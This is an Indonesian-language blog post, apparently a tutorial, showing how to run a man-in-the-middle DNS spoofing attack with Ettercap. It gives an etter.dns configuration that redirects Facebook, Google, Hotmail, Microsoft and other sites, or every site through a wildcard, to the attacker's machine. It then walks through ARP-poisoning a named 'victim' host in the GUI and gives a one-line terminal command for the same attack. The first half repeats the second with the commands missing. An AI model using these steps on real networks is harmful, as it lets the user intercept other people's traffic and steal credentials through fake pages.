dulu saya pernah posting cara DNS spoofing di Windows menggunakan Cain and Abel...
Atur dulu dns spoof nya
buka console lalu ketikkan perintah
untuk mengetahui letak pengaturan ettercap
kemudian atur dns spoofnya di pengaturan etter.dns
rubah ipnya menjadi ip kamu disini ip komputer saya 192.168.1.21
rubah di bagian ini
Kita akan spoofing facebook apabila ada korban yang membuka facebook akan di arahkan ke ip kita
KALAU INGIN SEMUA SITUS DI SPOOFING CUKUP TAMBAHKAN
*A (ip pc anda) misal = *A 192.168.1.74
pada bagian bawah sendiri.Di bawah #vim:ts=8:noexpandtab
setelah itu save dengan menekan cxtr+x lalu y dan enter
Sekarang tinggal memulai spoof dengan ettercap dengan gui agar hasil maksimal untuk spoof_dns
buka terminal dan jalankan ettercap dengan perintah
lalu pilih sniff > uniffied sniffing lalu rubah interface kalian
disini saya menggunakan wlan2
lalu pilih host > scan host setelah berhasil scan lalu liat host > host list
korbann saya ada pada ip 192.168.1.20
setelah itu pilih mitm > arp poisoning > lalu centang sniff remote connection lalu ok
dan pilih plugins > manage the plugins > pilih dns_spoof dengan menklik 2x
sekarang waktunya untuk memulai meracuni ip
dengan memilih opsi start > start sniffing
sukses spoofing
GOOD LUCK . ..
atau kalau pingin cepet lewat terminal juga bisa
buka terminal lalu ketikkan perintah
sekarang saya mau share Dns spoofing di Backtrack dengan Ettercap...
kebetulan masih byk yang belum tau dengan statusbaru.com ( jejaring sosial buatan Indonesia ) makanya kita alihkan www.facebook.com pada jaringan kabel ( LAN ) ataupun Wireles...
berikut POC nyaAtur dulu dns spoof nya
buka console lalu ketikkan perintah
locate etter.dns
untuk mengetahui letak pengaturan ettercap
kemudian atur dns spoofnya di pengaturan etter.dns
gedit /usr/local/share/ettercap/etter.dns
rubah ipnya menjadi ip kamu disini ip komputer saya 192.168.1.21
rubah di bagian ini
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
www.mercadolivre.com.br A 192.168.1.74
*.globo.com A 192.168.1.74
globo.com A 192.168.1.74
www.msn.com A 192.168.1.74
www.hotmail.com A 192.168.1.74
*.hotmail.com A 192.168.1.74
www.globo.com A 192.168.1.74
www.orkut.com A 192.168.1.74
*.orkut.com A 192.168.1.74
www.google.com A 192.168.1.74
*.google.com A 192.168.1.74
microsoft.com A 192.168.1.74
*.microsoft.com A 192.168.1.74
www.facebook.com A 192.168.1.74
*.facebook.com A 192.168.1.74
www.microsoft.com PTR 192.168.1.74 # Wildcards in PTR are not allowed
Kita akan spoofing facebook apabila ada korban yang membuka facebook akan di arahkan ke ip kita
KALAU INGIN SEMUA SITUS DI SPOOFING CUKUP TAMBAHKAN
*A (ip pc anda) misal = *A 192.168.1.74
pada bagian bawah sendiri.Di bawah #vim:ts=8:noexpandtab
setelah itu save dengan menekan cxtr+x lalu y dan enter
Sekarang tinggal memulai spoof dengan ettercap dengan gui agar hasil maksimal untuk spoof_dns
buka terminal dan jalankan ettercap dengan perintah
ettercap -G
lalu pilih sniff > uniffied sniffing lalu rubah interface kalian
disini saya menggunakan wlan2
lalu pilih host > scan host setelah berhasil scan lalu liat host > host list
korbann saya ada pada ip 192.168.1.20
setelah itu pilih mitm > arp poisoning > lalu centang sniff remote connection lalu ok
dan pilih plugins > manage the plugins > pilih dns_spoof dengan menklik 2x
sekarang waktunya untuk memulai meracuni ip
dengan memilih opsi start > start sniffing
sukses spoofing
GOOD LUCK . ..
atau kalau pingin cepet lewat terminal juga bisa
buka terminal lalu ketikkan perintah
ettercap -Tqi wlan0 -P dns_spoof -M arp // //
Post a Comment